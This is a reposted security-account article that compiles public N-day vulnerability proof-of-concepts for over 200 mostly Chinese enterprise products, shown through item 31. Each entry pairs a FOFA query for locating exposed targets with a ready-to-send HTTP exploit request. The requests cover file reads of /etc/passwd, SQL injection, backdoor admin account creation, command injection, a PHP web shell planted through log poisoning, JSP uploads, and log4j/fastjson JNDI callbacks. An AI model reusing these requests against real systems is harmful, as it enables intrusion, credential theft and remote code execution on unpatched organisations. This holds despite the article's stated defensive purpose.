Public Internet Vulnerability Roundup 202309-202406
道一安全 (Daoyi Security) 2024-06-05 07:41 Beijing
The following article is reposted from 网络安全新视界; author: 网络安全新视界

Purpose: exploitation of N-day vulnerabilities accounts for a large share of real-world attack activity; we hope this article helps with defense. Defenders can use its contents to check their own exposure.

Sources: this article covers 203 POCs for high-impact vulnerabilities disclosed publicly in China and abroad between September 2023 and May 2024, all collected from other public accounts or websites on the Internet and compiled for publication by the 网络安全新视界 team.

Patches: all of these vulnerabilities are publicly known; contact the product vendor for patches or remediation guidance.

Content: due to length limits, a few POCs that are too long are replaced with the word PAYLOAD; search for the complete POC yourself if you need it.

Legal: if this content infringes any party's legitimate rights, contact the 网络安全新视界 team via the account backend to have the relevant content removed.

Notice

To keep things simple and easy to browse, there is no "reply to get the full list" gate. This article is the complete list; when using it, press F12 and search for a keyword.

Bookmark this article if you need it. You can also follow this public account (网络安全新视界).

Table of Contents

01

1. StarRocks MPP database unauthorized access
2. Casdoor static arbitrary file read
3. EasyCVR smart edge gateway userlist information disclosure
4. EasyCVR video management platform arbitrary user creation
5. NUUO NVR video storage management device remote command execution
6. Sangfor NGAF arbitrary file read
7. 鸿运 (Hongyun) active safety monitoring cloud platform arbitrary file download
8. Phicomm router RCE
9. DocCMS (稻壳CMS) keyword unauthenticated SQL injection
10. Landray EIS smart collaboration platform api.aspx arbitrary file upload
11. Landray EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. Hongfan iOffice ioFileDown arbitrary file read
14. Huaxia ERP (jshERP) sensitive information disclosure
15. Huaxia ERP getAllList information disclosure
16. Hongfan HFOffice 医微云 SQL injection
17. Dahua DSS itcBulletin SQL injection
18. Dahua DSS digital surveillance system user_edit.action information disclosure
19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. Dahua ICC intelligent IoT management platform arbitrary file read
21. Dahua ICC intelligent IoT management platform random remote code execution
22. Dahua ICC intelligent IoT management platform log4j remote code execution
23. Dahua ICC intelligent IoT management platform fastjson remote code execution
24. Yonyou NC 6.5 accept.jsp arbitrary file upload
25. Yonyou NC registerServlet JNDI remote code execution
26. Yonyou NC linkVoucher SQL injection
27. Yonyou NC showcontent SQL injection
28. Yonyou NC grouptemplet arbitrary file upload
29. Yonyou NC down/bill SQL injection
30. Yonyou NC importPml SQL injection
31. Yonyou NC runStateServlet SQL injection
32. Yonyou NC complainbilldetail SQL injection
33. Yonyou NC downTax/download SQL injection
34. Yonyou NC warningDetailInfo interface SQL injection
35. Yonyou NC-Cloud importhttpscer arbitrary file upload
36. Yonyou NC-Cloud soapFormat XXE
37. Yonyou NC-Cloud IUpdateService XXE
38. Yonyou U8 Cloud smartweb2.RPC.d XXE
39. Yonyou U8 Cloud RegisterServlet SQL injection
40. Yonyou U8-Cloud XChangeServlet XXE
41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
42. Yonyou GRP-U8 SmartUpload01 file upload
43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
45. Yonyou GRP-U8 ufgovbank XXE
46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
48. Yonyou U8 CRM swfupload arbitrary file upload
49. Yonyou U8 CRM uploadfile.php interface arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. 云时空 (Yunshikong) social commerce ERP validateLoginName SQL injection
52. Weaver E-Office json_common.php SQL injection
53. DPtech VPN Service arbitrary file upload
54. Chanjet T+ getstorewarehousebystore remote code execution
55. Chanjet T+ getdecallusers information disclosure
56. Chanjet T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
57. Chanjet T+ keyEdit.aspx SQL injection
58. Chanjet T+ KeyInfoList.aspx SQL injection
59. XETUX software dynamiccontent.properties.xhtml remote code execution
60. Byzoro (百卓) Smart management platform importexport.php SQL injection
61. 浙大恩特 (Zheda Ente) customer resource management system fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. 捷诚 (Jiecheng) management information system CWSFinanceCommon SQL injection
65. 优卡特 (Youkate) 脸爱云 face-recognition smart management platform 1.0.55.0.0.1 authorization bypass
66. Wanhu ezOFFICE collaboration platform SendFileCheckTemplateEdit SQL injection
67. Wanhu ezOFFICE wpsservlet arbitrary file upload
68. Wanhu ezOFFICE wf_printnum.jsp SQL injection
69. Wanhu ezOFFICE contract_gd.jsp SQL injection
70. Wanhu ezEIP success command execution
71. 邦永 (Bangyong) PM2 project management system Global_UserLogin.aspx SQL injection
72. Seeyon OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. Seeyon M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. Newcapec (新开普) campus mobile service management platform service.action remote command execution
77. F22 apparel management software UploadHandler.ashx arbitrary file upload
78. pkpmbs construction quality supervision system FileUpload.ashx file upload
79. BYTEVALUE (百为) traffic-control router remote command execution
80. 速达天耀 (Suda Tianyao) software DesignReportSave.jsp interface arbitrary file upload
81. Uniview (宇视) video surveillance main-cgi password disclosure
82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. Japanese Tosei self-service laundry machine RCE
87. DBAPPSecurity (安恒) 明御 security gateway aaa_local_web_preview file upload
88. DBAPPSecurity (安恒) 明御 security gateway aaa_portal_auth_config_reset remote command execution
89. Seeyon (致远互联) FE collaborative office platform editflow_manager SQL injection
90. Hikvision IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
91. Hikvision integrated security management platform orgManage/v1/orgs/download arbitrary file read
92. Hikvision operations management center session command execution
93. QiAnXin 网神 SecGate 3600 firewall app_av_import_save arbitrary file upload
94. QiAnXin 网神 SecGate 3600 firewall obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast (盈可视) HD smart recording system busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 settings cstecgi.cgi getSysStatusCfg information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. GoAnywhere MFT unauthenticated admin account creation
111. WordPress Plugin HTML5 Video Player SQL injection
112. WordPress Plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. 北京百绰智能 S210 management platform uploadfile.php arbitrary file upload
119. 北京百绰智能 S20 backend sysmanageajax.php SQL injection
120. 北京百绰智能 S40 management platform import web.php arbitrary file upload
121. 北京百绰智能 S42 management platform userattestation.php arbitrary file upload
122. 北京百绰智能 s200 management platform /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. 湖南建研 (Hunan Jianyan) engineering quality inspection system arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. Aiohttp path traversal
127. Glodon (广联达) Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer service system arbitrary file upload
131. Mini-Tmall <= 20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
133. H5 Cloud Mall (云商城) file.php file upload
134. Netentsec (网康) NS-ASG application security gateway index.php SQL injection
135. Netentsec (网康) NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
136. NextChat cors SSRF
137. Fujian Kelixun (科立讯) communications command and dispatch platform down_file.php SQL injection
138. Fujian Kelixun (科立讯) communications command and dispatch platform pwd_update.php SQL injection
139. Fujian Kelixun (科立讯) communications command and dispatch platform editemedia.php SQL injection
140. Fujian Kelixun (科立讯) communications command and dispatch platform get_extension_yl.php SQL injection
141. Kelixun (科立讯) communications command and dispatch management platform ajax_users.php SQL injection
142. CMSV6 vehicle monitoring platform weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v.4.9.4 path traversal
148. CrushFTP authentication bypass and template injection
149. AJ-Report open-source dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. gradio arbitrary file read
154. 天维尔 (Tianwei'er) fire rescue operations dispatch platform SQL injection
155. 六零导航页 (60 navigation page) file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. 美特 (Meite) CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. INFINITT (英飞达) medical imaging PACS WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. Keytop (科拓) fully intelligent parking fee system Webservice.asmx arbitrary file upload
162. 和丰 (Hefeng) multimedia information publishing system QH.aspx arbitrary file upload
163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
164. 慧校园 (安校易) smart campus management system FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. 中成科信 ticketing management platform SeatMapHandler SQL injection
167. 精益价值管理系统 (Lean Value Management System) DownLoad.aspx arbitrary file read
168. Hongjing (宏景) EHR OutputCode arbitrary file read
169. Hongjing (宏景) EHR downlawbase SQL injection
170. Hongjing (宏景) EHR DisplayExcelCustomReport arbitrary file read
171. 通天星 (Tongtianxing) CMSV6 vehicle positioning monitoring platform SQL injection
172. DT HD license plate recognition camera arbitrary file read
173. Check Point security gateway arbitrary file read
174. Jinher (金和) OA C6 FileDownLoad.aspx arbitrary file read
175. Jinher (金和) OA C6 IncentivePlanFulfill.aspx SQL injection
176. Telecom gateway configuration management system rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C campus network self-service system flexfileupload arbitrary file upload
179. 建文 (Jianwen) engineering management system arbitrary file read
180. 帮管客 (Bangguanke) CRM jiliyu SQL injection
181. 润申科技 (Runshen) enterprise standardization management system UpdataLogHandler.ashx SQL injection
182. 润申科技 (Runshen) enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
183. Guangzhou 图创 (Tuchuang) library cluster management system updOpuserPw SQL injection
184. 迅饶科技 (Xunrao) X2Modbus gateway AddUser arbitrary user creation
185. Realor (瑞友) 天翼 application virtualization system SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection
188. 叁体 佳会 video conferencing attachment arbitrary file read
189. 蓝网科技 (Lanwang) clinical viewer system deleteStudy SQL injection
190. Short-video matrix marketing system poihuoqu arbitrary file read
191. ESAFENET (亿赛通) electronic document security management system NavigationAjax SQL injection
192. 富通天下 foreign trade ERP UploadEmailAttr arbitrary file upload
193. Hillstone (山石网科) 云鉴 security management system setsystemtimeaction command execution
194. 飞企互联 FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
195. Volans (飞鱼星) Internet behavior management system send_order.cgi command execution
196. Henan 风速科技 unified authentication platform password reset
197. 浙大恩特 (Zheda Ente) customer resource management system Quotegask_editAction SQL injection
198. Aliyun Drive (阿里云盘) WebDAV command injection
199. Cockpit assetsmanager_upload interface file upload
200. SeaCMS video management system dmku SQL injection
201. Founder (方正) all-media news editing system binary SQL injection
202. 微擎 (WeEngine) AccountEdit arbitrary file upload
203. 红海云 EHR PtFjk file upload

POC List

02

1. StarRocks MPP database unauthorized access
FOFA: title="StarRocks"
GET /mem_tracker HTTP/1.1
Host: URL


2. Casdoor static arbitrary file read
FOFA: title="Casdoor"
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


3. EasyCVR smart edge gateway userlist information disclosure
FOFA: title="EasyCVR"
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx


4. EasyCVR video management platform arbitrary user creation
FOFA: title="EasyCVR"

Set password to the MD5 of your own password
POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1


5. NUUO NVR video storage management device remote command execution
FOFA: title="Network Video Recorder Login"
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx


6. Sangfor NGAF arbitrary file read
FOFA: title="SANGFOR | NGAF"
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:


7. 鸿运 (Hongyun) active safety monitoring cloud platform arbitrary file download
FOFA: body="./open/webApi.html"
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host:


8. Phicomm router RCE
FOFA: icon_hash="-1344736688"
Log in to the admin panel with the default account admin, then perform the operation
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=<sysauth cookie obtained from the login in step one>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id;
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"

------WebKitFormBoundaryxbgjoytz--


9. DocCMS (稻壳CMS) keyword unauthenticated SQL injection
FOFA: app="Doccms"
GET /search/index.php?keyword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a
Host: x.x.x.x


The payload is the double URL-encoded form of the following statement

' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#

10. Landray EIS smart collaboration platform api.aspx arbitrary file upload
FOFA: icon_hash="953405444"

After upload, the response contains the path of the uploaded file
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: x.x.x.x:xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 197
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu

------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"; filename="icfitnya.txt"
Content-Type: text/html

jmnqjfdsupxgfidopeixbgsxbf
------WebKitFormBoundaryxdgaqmqu--


11. Landray EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
FOFA: icon_hash="953405444" || app="Landray-EIS智慧协同平台"
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

12. Jorani < 1.0.2 remote command execution
FOFA: title="Jorani"
Step one: obtain the cookies
GET /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: gzip

The csrf_cookie_jorani value in the response is used in the subsequent requests
HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 24 Oct 2023 09:34:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
Vary: Accept-Encoding


POST request: plants code that executes a base64-encoded command
POST /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
Accept-Encoding: gzip

csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor


Send the following request to the target to run the id command; the header value ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs= is the base64-encoded command
GET /pages/view/log-2023-10-24 HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
X-REQUESTED-WITH: XMLHttpRequest
Accept-Encoding: gzip

13. Hongfan iOffice ioFileDown arbitrary file read
FOFA: app="红帆-ioffice"
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Encoding: gzip


14. Huaxia ERP (jshERP) sensitive information disclosure
FOFA: body="jshERP-boot"
Leaked data includes usernames and passwords
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


15. Huaxia ERP getAllList information disclosure
CVE-2024-0490
FOFA: body="jshERP-boot"
Leaked data includes usernames and passwords
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
Host: 192.168.40.130:100
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Language: en
sec-ch-ua-platform: Windows
Accept-Encoding: gzip


16. Hongfan HFOffice 医微云 SQL injection
FOFA: title="HFOffice"
The POC calls a database function to compute the MD5 of 1234
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


17. Dahua DSS itcBulletin SQL injection
FOFA: app="dahua-DSS"
POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 345
Accept-Encoding: gzip

<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
<s11:Body>
<ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
<netMarkings>
(updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
</netMarkings>
</ns1:deleteBulletin>
</s11:Body>
</s11:Envelope>


18. Dahua DSS digital surveillance system user_edit.action information disclosure
FOFA: app="dahua-DSS"
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
FOFA: app="dahua-DSS"
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


20. Dahua ICC intelligent IoT management platform arbitrary file read
FOFA: body="*客户端会小于800*"
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


21. Dahua ICC intelligent IoT management platform random remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 161
Accept-Encoding: gzip
Connection: close
Content-Type: application/json;charset=utf-8

{
  "a":{
    "@type":"com.alibaba.fastjson.JSONObject",
    {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
  }""
}


22. Dahua ICC intelligent IoT management platform log4j remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Type: application/json;charset=utf-8

{
  "loginName":"${jndi:ldap://dnslog}"
}


23. Dahua ICC intelligent IoT management platform fastjson remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json;charset=utf-8
Accept-Encoding: gzip
Connection: close

{
  "a":{
    "@type":"com.alibaba.fastjson.JSONObject",
    {"@type":"java.net.URL","val":"http://DNSLOG"}
  }""
}


24. Yonyou NC 6.5 accept.jsp arbitrary file upload
FOFA: icon_hash="1085941792"
POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--

25. Yonyou NC registerServlet JNDI remote code execution
FOFA:app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog

26. Yonyou NC linkVoucher SQL injection
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

27. Yonyou NC showcontent SQL injection
FOFA:icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8

28. Yonyou NC grouptemplet arbitrary file upload
FOFA:icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--

/uapim/static/pages/nc/head.jsp

29. Yonyou NC down/bill SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

30. Yonyou NC importPml SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg
------WebKitFormBoundaryH970hbttBhoCyj9V--

31. Yonyou NC runStateServlet SQL injection
version<=6.5
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
